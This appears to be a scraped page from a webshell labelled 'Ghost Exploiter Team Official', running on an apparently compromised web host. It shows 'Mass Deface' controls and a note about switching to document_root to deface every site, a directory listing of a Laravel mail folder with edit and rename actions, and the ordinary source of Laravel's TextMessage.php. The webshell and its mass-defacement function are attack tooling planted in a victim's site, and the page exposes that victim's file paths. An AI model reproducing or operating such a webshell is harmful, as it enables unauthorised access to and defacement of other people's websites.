webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Mail
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Events
--
ren
Mailables
--
ren
Transport
--
ren
resources
--
ren
Attachment.php
4.915KB
edt
ren
LICENSE.md
1.05KB
edt
ren
MailManager.php
17.155KB
edt
ren
MailServiceProvider.php
1.724KB
edt
ren
Mailable.php
45.987KB
edt
ren
Mailer.php
18.124KB
edt
ren
Markdown.php
4.556KB
edt
ren
Message.php
9.862KB
edt
ren
PendingMail.php
3.464KB
edt
ren
SendQueuedMailable.php
3.597KB
edt
ren
SentMessage.php
1.973KB
edt
ren
TextMessage.php
1.385KB
edt
ren
composer.json
1.464KB
edt
ren
<?php namespace Illuminate\Mail; use Illuminate\Support\Traits\ForwardsCalls; /** * @mixin \Illuminate\Mail\Message */ class TextMessage { use ForwardsCalls; /** * The underlying message instance. * * @var \Illuminate\Mail\Message */ protected $message; /** * Create a new text message instance. * * @param \Illuminate\Mail\Message $message * @return void */ public function __construct($message) { $this->message = $message; } /** * Embed a file in the message and get the CID. * * @param string|\Illuminate\Contracts\Mail\Attachable|\Illuminate\Mail\Attachment $file * @return string */ public function embed($file) { return ''; } /** * Embed in-memory data in the message and get the CID. * * @param string|resource $data * @param string $name * @param string|null $contentType * @return string */ public function embedData($data, $name, $contentType = null) { return ''; } /** * Dynamically pass missing methods to the underlying message instance. * * @param string $method * @param array $parameters * @return mixed */ public function __call($method, $parameters) { return $this->forwardDecoratedCallTo($this->message, $method, $parameters); } }